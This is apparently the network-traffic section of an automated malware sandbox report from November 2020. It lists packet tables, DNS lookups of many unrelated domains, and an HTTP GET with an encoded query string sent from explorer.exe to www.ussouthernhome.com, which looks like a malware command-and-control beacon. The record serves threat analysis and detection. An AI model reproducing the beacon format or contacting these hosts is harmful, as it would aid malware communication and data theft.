Nov 20, 2020 20:13:48.091751099 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091769934 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091775894 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091794014 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091798067 CET	80	49726	198.49.23.141	192.168.2.3
Nov 20, 2020 20:13:48.091818094 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:48.091881990 CET	49726	80	192.168.2.3	198.49.23.141
Nov 20, 2020 20:13:53.305572987 CET	49727	80	192.168.2.3	66.235.200.112
Nov 20, 2020 20:13:53.322338104 CET	80	49727	66.235.200.112	192.168.2.3
Nov 20, 2020 20:13:53.322448969 CET	49727	80	192.168.2.3	66.235.200.112
Nov 20, 2020 20:13:53.322623968 CET	49727	80	192.168.2.3	66.235.200.112
Nov 20, 2020 20:13:53.339231014 CET	80	49727	66.235.200.112	192.168.2.3
Nov 20, 2020 20:13:53.828305006 CET	49727	80	192.168.2.3	66.235.200.112
Nov 20, 2020 20:13:53.845555067 CET	80	49727	66.235.200.112	192.168.2.3
Nov 20, 2020 20:13:53.845760107 CET	49727	80	192.168.2.3	66.235.200.112
Nov 20, 2020 20:13:58.890697956 CET	49728	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:13:58.907335997 CET	80	49728	34.102.136.180	192.168.2.3
Nov 20, 2020 20:13:58.907438040 CET	49728	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:13:58.907588005 CET	49728	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:13:58.924082041 CET	80	49728	34.102.136.180	192.168.2.3
Nov 20, 2020 20:13:59.024359941 CET	80	49728	34.102.136.180	192.168.2.3
Nov 20, 2020 20:13:59.024411917 CET	80	49728	34.102.136.180	192.168.2.3
Nov 20, 2020 20:13:59.024548054 CET	49728	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:13:59.024614096 CET	49728	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:13:59.041409016 CET	80	49728	34.102.136.180	192.168.2.3
Nov 20, 2020 20:14:04.120279074 CET	49730	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:14:04.136779070 CET	80	49730	34.102.136.180	192.168.2.3
Nov 20, 2020 20:14:04.136867046 CET	49730	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:14:04.137047052 CET	49730	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:14:04.153522015 CET	80	49730	34.102.136.180	192.168.2.3
Nov 20, 2020 20:14:04.252129078 CET	80	49730	34.102.136.180	192.168.2.3
Nov 20, 2020 20:14:04.252155066 CET	80	49730	34.102.136.180	192.168.2.3
Nov 20, 2020 20:14:04.252331018 CET	49730	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:14:04.252399921 CET	49730	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:14:04.268863916 CET	80	49730	34.102.136.180	192.168.2.3
Nov 20, 2020 20:14:09.324418068 CET	49731	80	192.168.2.3	23.227.38.64
Nov 20, 2020 20:14:09.340821028 CET	80	49731	23.227.38.64	192.168.2.3
Nov 20, 2020 20:14:09.340944052 CET	49731	80	192.168.2.3	23.227.38.64
Nov 20, 2020 20:14:09.341078043 CET	49731	80	192.168.2.3	23.227.38.64
Nov 20, 2020 20:14:09.357456923 CET	80	49731	23.227.38.64	192.168.2.3
Nov 20, 2020 20:14:09.492538929 CET	80	49731	23.227.38.64	192.168.2.3
Nov 20, 2020 20:14:09.492562056 CET	80	49731	23.227.38.64	192.168.2.3
Nov 20, 2020 20:14:09.492577076 CET	80	49731	23.227.38.64	192.168.2.3
Nov 20, 2020 20:14:09.492696047 CET	49731	80	192.168.2.3	23.227.38.64
Nov 20, 2020 20:14:09.492860079 CET	49731	80	192.168.2.3	23.227.38.64
Nov 20, 2020 20:14:09.494324923 CET	80	49731	23.227.38.64	192.168.2.3
Nov 20, 2020 20:14:09.494349003 CET	80	49731	23.227.38.64	192.168.2.3
Nov 20, 2020 20:14:09.494360924 CET	80	49731	23.227.38.64	192.168.2.3
Nov 20, 2020 20:14:09.494400978 CET	49731	80	192.168.2.3	23.227.38.64
Nov 20, 2020 20:14:09.494430065 CET	49731	80	192.168.2.3	23.227.38.64
Nov 20, 2020 20:14:09.494446993 CET	49731	80	192.168.2.3	23.227.38.64
Nov 20, 2020 20:14:09.494888067 CET	80	49731	23.227.38.64	192.168.2.3
Nov 20, 2020 20:14:09.494941950 CET	49731	80	192.168.2.3	23.227.38.64
Nov 20, 2020 20:14:09.509232998 CET	80	49731	23.227.38.64	192.168.2.3
Nov 20, 2020 20:14:09.509308100 CET	49731	80	192.168.2.3	23.227.38.64
Nov 20, 2020 20:14:14.792005062 CET	49735	80	192.168.2.3	160.122.148.234
Nov 20, 2020 20:14:17.908148050 CET	49735	80	192.168.2.3	160.122.148.234
Nov 20, 2020 20:14:23.908705950 CET	49735	80	192.168.2.3	160.122.148.234
Nov 20, 2020 20:14:37.660402060 CET	49739	80	192.168.2.3	160.122.148.234
Nov 20, 2020 20:14:40.675791025 CET	49739	80	192.168.2.3	160.122.148.234
Nov 20, 2020 20:14:46.676177979 CET	49739	80	192.168.2.3	160.122.148.234
Nov 20, 2020 20:14:51.939250946 CET	49742	80	192.168.2.3	65.254.250.119
Nov 20, 2020 20:14:52.037408113 CET	80	49742	65.254.250.119	192.168.2.3
Nov 20, 2020 20:14:52.037573099 CET	49742	80	192.168.2.3	65.254.250.119
Nov 20, 2020 20:14:52.037756920 CET	49742	80	192.168.2.3	65.254.250.119
Nov 20, 2020 20:14:52.136106968 CET	80	49742	65.254.250.119	192.168.2.3
Nov 20, 2020 20:14:52.143873930 CET	80	49742	65.254.250.119	192.168.2.3
Nov 20, 2020 20:14:52.143898964 CET	80	49742	65.254.250.119	192.168.2.3
Nov 20, 2020 20:14:52.144273996 CET	49742	80	192.168.2.3	65.254.250.119
Nov 20, 2020 20:14:52.144418955 CET	49742	80	192.168.2.3	65.254.250.119
Nov 20, 2020 20:14:52.243113995 CET	80	49742	65.254.250.119	192.168.2.3
Nov 20, 2020 20:14:57.374717951 CET	49743	80	192.168.2.3	192.64.147.164
Nov 20, 2020 20:14:57.518985033 CET	80	49743	192.64.147.164	192.168.2.3
Nov 20, 2020 20:14:57.519130945 CET	49743	80	192.168.2.3	192.64.147.164
Nov 20, 2020 20:14:57.519289970 CET	49743	80	192.168.2.3	192.64.147.164
Nov 20, 2020 20:14:57.663256884 CET	80	49743	192.64.147.164	192.168.2.3
Nov 20, 2020 20:14:57.684051991 CET	80	49743	192.64.147.164	192.168.2.3
Nov 20, 2020 20:14:57.684076071 CET	80	49743	192.64.147.164	192.168.2.3
Nov 20, 2020 20:14:57.684325933 CET	49743	80	192.168.2.3	192.64.147.164
Nov 20, 2020 20:14:57.684393883 CET	49743	80	192.168.2.3	192.64.147.164
Nov 20, 2020 20:14:57.828371048 CET	80	49743	192.64.147.164	192.168.2.3
Nov 20, 2020 20:14:57.828394890 CET	80	49743	192.64.147.164	192.168.2.3
Nov 20, 2020 20:14:57.828885078 CET	49743	80	192.168.2.3	192.64.147.164
Nov 20, 2020 20:15:02.758438110 CET	49744	80	192.168.2.3	35.186.238.101
Nov 20, 2020 20:15:02.774991035 CET	80	49744	35.186.238.101	192.168.2.3
Nov 20, 2020 20:15:02.776062012 CET	49744	80	192.168.2.3	35.186.238.101
Nov 20, 2020 20:15:02.776315928 CET	49744	80	192.168.2.3	35.186.238.101
Nov 20, 2020 20:15:02.792855978 CET	80	49744	35.186.238.101	192.168.2.3
Nov 20, 2020 20:15:02.891478062 CET	80	49744	35.186.238.101	192.168.2.3
Nov 20, 2020 20:15:02.891526937 CET	80	49744	35.186.238.101	192.168.2.3
Nov 20, 2020 20:15:02.891711950 CET	49744	80	192.168.2.3	35.186.238.101
Nov 20, 2020 20:15:02.891784906 CET	49744	80	192.168.2.3	35.186.238.101
Nov 20, 2020 20:15:02.908286095 CET	80	49744	35.186.238.101	192.168.2.3
Nov 20, 2020 20:15:13.024780035 CET	49745	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:15:13.041336060 CET	80	49745	34.102.136.180	192.168.2.3
Nov 20, 2020 20:15:13.044192076 CET	49745	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:15:13.044230938 CET	49745	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:15:13.060760975 CET	80	49745	34.102.136.180	192.168.2.3
Nov 20, 2020 20:15:13.160152912 CET	80	49745	34.102.136.180	192.168.2.3
Nov 20, 2020 20:15:13.160185099 CET	80	49745	34.102.136.180	192.168.2.3
Nov 20, 2020 20:15:13.160363913 CET	49745	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:15:13.160386086 CET	49745	80	192.168.2.3	34.102.136.180
Nov 20, 2020 20:15:13.177289963 CET	80	49745	34.102.136.180	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 20:12:56.247581005 CET	60152	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:12:56.290533066 CET	53	60152	8.8.8.8	192.168.2.3
Nov 20, 2020 20:12:57.004048109 CET	57544	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:12:57.030999899 CET	53	57544	8.8.8.8	192.168.2.3
Nov 20, 2020 20:12:57.707721949 CET	55984	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:12:57.734718084 CET	53	55984	8.8.8.8	192.168.2.3
Nov 20, 2020 20:12:58.612056971 CET	64185	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:12:58.639239073 CET	53	64185	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:01.014048100 CET	65110	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:01.049793959 CET	53	65110	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:01.685911894 CET	58361	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:01.713012934 CET	53	58361	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:02.408107996 CET	63492	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:02.435436010 CET	53	63492	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:03.399342060 CET	60831	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:03.426584959 CET	53	60831	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:04.106293917 CET	60100	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:04.133712053 CET	53	60100	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:04.816602945 CET	53195	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:04.843772888 CET	53	53195	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:05.492518902 CET	50141	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:05.528096914 CET	53	50141	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:06.437241077 CET	53023	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:06.464438915 CET	53	53023	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:07.553205013 CET	49563	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:07.580269098 CET	53	49563	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:08.548835039 CET	51352	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:08.575948954 CET	53	51352	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:09.305170059 CET	59349	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:09.342957973 CET	53	59349	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:25.557703018 CET	57084	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:25.597769022 CET	53	57084	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:34.530728102 CET	58823	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:34.557849884 CET	53	58823	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:43.661276102 CET	57568	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:43.696640015 CET	53	57568	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:47.504547119 CET	50540	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:47.546031952 CET	53	50540	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:53.098772049 CET	54366	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:53.304198980 CET	53	54366	8.8.8.8	192.168.2.3
Nov 20, 2020 20:13:58.849778891 CET	53034	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:13:58.889568090 CET	53	53034	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:04.044615984 CET	57762	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:04.062829018 CET	55435	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:04.097718954 CET	53	57762	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:04.102109909 CET	53	55435	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:09.270708084 CET	50713	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:09.323026896 CET	53	50713	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:10.497039080 CET	56132	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:10.524116993 CET	53	56132	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:14.509269953 CET	58987	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:14.790863037 CET	53	58987	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:15.527842045 CET	56579	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:15.564673901 CET	53	56579	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:37.294660091 CET	60633	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:37.637876034 CET	53	60633	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:40.966525078 CET	61292	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:41.431552887 CET	53	61292	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:46.445712090 CET	63619	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:46.580270052 CET	64938	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:46.607456923 CET	53	64938	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:46.788213968 CET	53	63619	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:48.465173006 CET	61946	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:48.516504049 CET	53	61946	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:51.807282925 CET	64910	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:51.938031912 CET	53	64910	8.8.8.8	192.168.2.3
Nov 20, 2020 20:14:57.175626993 CET	52123	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:14:57.373497009 CET	53	52123	8.8.8.8	192.168.2.3
Nov 20, 2020 20:15:02.698811054 CET	56130	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:15:02.756552935 CET	53	56130	8.8.8.8	192.168.2.3
Nov 20, 2020 20:15:07.898215055 CET	56338	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:15:07.962762117 CET	53	56338	8.8.8.8	192.168.2.3
Nov 20, 2020 20:15:12.983716011 CET	59420	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:15:13.024260044 CET	53	59420	8.8.8.8	192.168.2.3
Nov 20, 2020 20:15:18.165290117 CET	58784	53	192.168.2.3	8.8.8.8
Nov 20, 2020 20:15:18.610785007 CET	53	58784	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 20, 2020 20:13:47.504547119 CET	192.168.2.3	8.8.8.8	0xaf73	Standard query (0)	www.ussouthernhome.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:13:53.098772049 CET	192.168.2.3	8.8.8.8	0x8532	Standard query (0)	www.myreviewandbonuses.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:13:58.849778891 CET	192.168.2.3	8.8.8.8	0x36cc	Standard query (0)	www.thrust-board.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:04.062829018 CET	192.168.2.3	8.8.8.8	0x60c4	Standard query (0)	www.teelinkz.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:09.270708084 CET	192.168.2.3	8.8.8.8	0x4f87	Standard query (0)	www.not-taboo.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:14.509269953 CET	192.168.2.3	8.8.8.8	0x3991	Standard query (0)	www.sz360buy.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:37.294660091 CET	192.168.2.3	8.8.8.8	0xc30d	Standard query (0)	www.sz360buy.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:40.966525078 CET	192.168.2.3	8.8.8.8	0x2ce0	Standard query (0)	www.houseofhawthorn.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:46.445712090 CET	192.168.2.3	8.8.8.8	0xda4a	Standard query (0)	www.bs600mc.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:51.807282925 CET	192.168.2.3	8.8.8.8	0x7017	Standard query (0)	www.tnicholson.design	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:57.175626993 CET	192.168.2.3	8.8.8.8	0x3a9	Standard query (0)	www.sabaicraft.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:15:02.698811054 CET	192.168.2.3	8.8.8.8	0xe942	Standard query (0)	www.deadroommn.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:15:07.898215055 CET	192.168.2.3	8.8.8.8	0x5604	Standard query (0)	www.biolineapparel.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:15:12.983716011 CET	192.168.2.3	8.8.8.8	0xb034	Standard query (0)	www.keitakora.com	A (IP address)	IN (0x0001)
Nov 20, 2020 20:15:18.165290117 CET	192.168.2.3	8.8.8.8	0x54	Standard query (0)	www.qzrpxx.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 20, 2020 20:13:47.546031952 CET	8.8.8.8	192.168.2.3	0xaf73	No error (0)	www.ussouthernhome.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:13:47.546031952 CET	8.8.8.8	192.168.2.3	0xaf73	No error (0)	ext-sq.squarespace.com		198.49.23.141	A (IP address)	IN (0x0001)
Nov 20, 2020 20:13:47.546031952 CET	8.8.8.8	192.168.2.3	0xaf73	No error (0)	ext-sq.squarespace.com		198.185.159.141	A (IP address)	IN (0x0001)
Nov 20, 2020 20:13:53.304198980 CET	8.8.8.8	192.168.2.3	0x8532	No error (0)	www.myreviewandbonuses.com	myreviewandbonuses.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:13:53.304198980 CET	8.8.8.8	192.168.2.3	0x8532	No error (0)	myreviewandbonuses.com		66.235.200.112	A (IP address)	IN (0x0001)
Nov 20, 2020 20:13:58.889568090 CET	8.8.8.8	192.168.2.3	0x36cc	No error (0)	www.thrust-board.com	thrust-board.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:13:58.889568090 CET	8.8.8.8	192.168.2.3	0x36cc	No error (0)	thrust-board.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:04.102109909 CET	8.8.8.8	192.168.2.3	0x60c4	No error (0)	www.teelinkz.com	teelinkz.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:14:04.102109909 CET	8.8.8.8	192.168.2.3	0x60c4	No error (0)	teelinkz.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:09.323026896 CET	8.8.8.8	192.168.2.3	0x4f87	No error (0)	www.not-taboo.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:14:09.323026896 CET	8.8.8.8	192.168.2.3	0x4f87	No error (0)	shops.myshopify.com		23.227.38.64	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:14.790863037 CET	8.8.8.8	192.168.2.3	0x3991	No error (0)	www.sz360buy.com		160.122.148.234	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:37.637876034 CET	8.8.8.8	192.168.2.3	0xc30d	No error (0)	www.sz360buy.com		160.122.148.234	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:41.431552887 CET	8.8.8.8	192.168.2.3	0x2ce0	Server failure (2)	www.houseofhawthorn.com	none	none	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:51.938031912 CET	8.8.8.8	192.168.2.3	0x7017	No error (0)	www.tnicholson.design		65.254.250.119	A (IP address)	IN (0x0001)
Nov 20, 2020 20:14:57.373497009 CET	8.8.8.8	192.168.2.3	0x3a9	No error (0)	www.sabaicraft.com		192.64.147.164	A (IP address)	IN (0x0001)
Nov 20, 2020 20:15:02.756552935 CET	8.8.8.8	192.168.2.3	0xe942	No error (0)	www.deadroommn.com		35.186.238.101	A (IP address)	IN (0x0001)
Nov 20, 2020 20:15:07.962762117 CET	8.8.8.8	192.168.2.3	0x5604	Name error (3)	www.biolineapparel.com	none	none	A (IP address)	IN (0x0001)
Nov 20, 2020 20:15:13.024260044 CET	8.8.8.8	192.168.2.3	0xb034	No error (0)	www.keitakora.com	keitakora.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:15:13.024260044 CET	8.8.8.8	192.168.2.3	0xb034	No error (0)	keitakora.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 20, 2020 20:15:18.610785007 CET	8.8.8.8	192.168.2.3	0x54	No error (0)	www.qzrpxx.com	ls3xg13085cb982.dlszywz.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:15:18.610785007 CET	8.8.8.8	192.168.2.3	0x54	No error (0)	ls3xg13085cb982.dlszywz.com		47.91.170.148	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.ussouthernhome.com

www.myreviewandbonuses.com

www.thrust-board.com

www.teelinkz.com

www.not-taboo.com

www.tnicholson.design

www.sabaicraft.com

www.deadroommn.com

www.keitakora.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49726	198.49.23.141	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 20:13:47.686299086 CET	1055	OUT	GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1 Host: www.ussouthernhome.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 20:13:47.824301004 CET	1057	IN	HTTP/1.1 400 Bad Request content-length: 77564 expires: Thu, 01 Jan 1970 00:00:00 UTC pragma: no-cache cache-control: no-cache, must-revalidate content-type: text/html; charset=UTF-8 connection: close date: Fri, 20 Nov 2020 19:13:47 UTC x-contextid: FLYzyLwI/wpkpTukT server: Squarespace Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
Nov 20, 2020 20:13:47.824321985 CET	1058	IN	Data Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
